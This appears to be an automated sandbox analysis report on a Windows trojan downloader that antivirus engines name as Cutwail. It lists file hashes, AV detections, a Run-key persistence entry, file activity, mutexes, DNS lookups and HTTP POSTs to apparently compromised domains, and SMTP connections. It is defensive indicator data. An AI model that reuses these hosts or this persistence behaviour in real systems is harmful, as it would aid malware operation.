Analysis Date: 2014-07-17 19:21:06
MD5: 0352a23a94523a05e90d42650238055b
SHA1: 04685c6638d0a0a2eafffb7398a5e70e0170bd12

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: 5201ccd72d00b137f6f38d0ed5044fff sha1: 17e9d172cfd754351f3eb15b1eba19d484596307 size: 1024
Section: .rdata md5: 5e001465d8cd3c885bc984c952e08cb6 sha1: 32ee3ee5d774fd02de6c2a88102ae2ee5e5e4e06 size: 1024
Section: .data md5: fc7eb756c1f4b17f16449816cc3cec81 sha1: 2617518e49202d532dae1af9ba05aecfefd1e75b size: 512
Section: .rsrc md5: 18d2e98ddfa82b040a4b42cc39357346 sha1: 2692758b151176577614b0b554cb44e7d536e641 size: 58368
Timestamp: 2014-06-26 11:37:06
PEhash: b4f483da6ed48ce7fc8d956757473c5257e20a82
IMPhash: 4ca0a0adb97211d9334271ded971bdde
AV: 360 Safe ➝ Gen:Variant.Kazy.327123
AV: Ad-Aware ➝ Gen:Variant.Kazy.327123
AV: Alwil (avast) ➝ Cutwail-CM [Trj]
AV: Arcabit (arcavir) ➝ no_virus
AV: Authentium ➝ no_virus
AV: Avira (antivir) ➝ TR/Dropper.Gen
AV: CA (E-Trust Ino) ➝ no_virus
AV: CAT (quickheal) ➝ no_virus
AV: ClamAV ➝ no_virus
AV: Dr. Web ➝ Trojan.MulDrop3.14959
AV: Emsisoft ➝ no_virus
AV: Eset (nod32) ➝ Win32/Kryptik.CFFF
AV: Fortinet ➝ W32/Cutwail.DDQ!tr
AV: Frisk (f-prot) ➝ no_virus
AV: F-Secure ➝ Gen:Variant.Kazy.327123
AV: Grisoft (avg) ➝ Agent
AV: Ikarus ➝ Trojan.Win32.Cutwail
AV: K7 ➝ Riskware ( 0040eff71 )
AV: Kaspersky ➝ Trojan.Win32.Cutwail.ddq
AV: MalwareBytes ➝ Trojan.Agent.US
AV: Mcafee ➝ RDN/Downloader.a!ru
AV: Microsoft Security Essentials ➝ TrojanDownloader:Win32/Cutwail.BS
AV: MicroWorld (escan) ➝ Gen:Variant.Kazy.327123
AV: Norman ➝ winpe/Agent.BDUSS
AV: Rising ➝ no_virus
AV: Sophos ➝ no_virus
AV: Symantec ➝ no_virus
AV: Trend Micro ➝ no_virus
AV: VirusBlokAda (vba32) ➝ no_virus

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\memhequmorus ➝ C:\Documents and Settings\Administrator\memhequmorus.exe
Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\software\microsoft\windows\currentversion\AppManagement ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\hzjinhai[1].htm
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\butteri-altamaremma[1].htm
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\hendersonranchprop[1].htm
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Crypto\RSA\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\a18ca4003deb042bbee7a40f15e1970b_666939c9-243b-475e-9504-51724db22670
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\bluecrushcommunications[1].htm
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\ravanagym[1].htm
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\tasteofcharlotte[2].htm
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\americangeriatrics[1].htm
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\eurofilms[1].htm
Creates File: C:\Documents and Settings\Administrator\memhequmorus.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\atre-ebisu-6fdental[1].htm
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\sekretuspeha[1].htm
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\tasteofcharlotte[1].htm
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\kheldon[1].htm
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\industrieundhandelsverlag[1].htm
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\ogtrust[1].htm
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\bogueoil[1].htm
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\boiteaservices[1].htm
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\atre-ebisu-6fdental[1].htm
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\butteri-altamaremma[1].htm
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\sekretuspeha[1].htm
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\tasteofcharlotte[1].htm
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\kheldon[1].htm
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\industrieundhandelsverlag[1].htm
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\ravanagym[1].htm
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\tasteofcharlotte[2].htm
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\ogtrust[1].htm
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\bogueoil[1].htm
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\eurofilms[1].htm
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\americangeriatrics[1].htm
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: memhequmorus
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: americangeriatrics.org
Winsock DNS: hendersonranchprop.com
Winsock DNS: kheldon.net
Winsock DNS: boiteaservices.com
Winsock DNS: bogueoil.com
Winsock DNS: fjellparkfestivalen.com
Winsock DNS: wingup-pt.com
Winsock DNS: leads.com.my
Winsock DNS: eurofilms.com
Winsock DNS: sekretuspeha.com
Winsock DNS: atre-ebisu-6fdental.com
Winsock DNS: industrieundhandelsverlag.de
Winsock DNS: hzjinhai.com
Winsock DNS: samcons.com
Winsock DNS: bluecrushcommunications.com
Winsock DNS: tasteofcharlotte.com
Winsock DNS: ogtrust.jp
Winsock DNS: ravanagym.com
Winsock DNS: butteri-altamaremma.com

Network Details:

DNS: smtp.glbdns2.microsoft.com (Type: A) ➝ 65.55.176.126
DNS: smtp.mail.us.am0.yahoodns.net (Type: A) ➝ 98.138.105.21
DNS: smtp.mail.us.am0.yahoodns.net (Type: A) ➝ 98.139.211.125
DNS: smtp.mail.us.am0.yahoodns.net (Type: A) ➝ 63.250.193.228
DNS: sekretuspeha.com (Type: A) ➝ 74.200.250.183
DNS: tasteofcharlotte.com (Type: A) ➝ 208.112.58.229
DNS: industrieundhandelsverlag.de (Type: A) ➝ 87.106.1.149
DNS: smtp.live.com (Type: A)
DNS: smtp.mail.yahoo.com (Type: A)
DNS: kheldon.net (Type: A)
HTTP POST: http://sekretuspeha.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP POST: http://tasteofcharlotte.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP POST: http://tasteofcharlotte.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP POST: http://industrieundhandelsverlag.de/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Flows TCP: 192.168.1.1:1031 ➝ 65.55.176.126:25
Flows TCP: 192.168.1.1:1032 ➝ 98.138.105.21:25
Flows TCP: 192.168.1.1:1035 ➝ 74.200.250.183:80
Flows TCP: 192.168.1.1:1043 ➝ 208.112.58.229:80
Flows TCP: 192.168.1.1:1044 ➝ 208.112.58.229:80
Flows TCP: 192.168.1.1:1052 ➝ 87.106.1.149:80

Raw Pcap

Strings